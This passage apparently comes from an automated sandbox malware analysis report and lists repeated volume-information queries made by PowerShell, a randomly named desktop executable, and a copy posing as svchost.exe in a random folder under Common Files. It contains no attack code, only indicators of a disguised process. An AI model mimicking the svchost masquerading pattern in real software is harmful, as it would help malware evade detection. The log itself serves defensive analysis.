            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Users\user\Desktop\qINcOlwRud.exe VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
